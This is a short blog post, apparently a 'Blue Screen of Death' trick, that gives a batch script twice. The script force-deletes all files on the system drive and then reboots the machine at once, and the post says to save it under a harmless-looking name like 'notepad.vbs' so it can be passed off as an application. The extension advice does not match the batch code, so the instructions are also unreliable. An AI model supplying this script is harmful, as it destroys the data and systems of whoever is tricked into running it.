The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefull and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install ur windows again
open notepad and type the below code(or) copy paste the code...
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
name the file (anyname).vbs
eg ::Save it as “notepad.vbs”
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
name the file (anyname).vbs
eg ::Save it as “notepad.vbs”
0 comments:
Post a Comment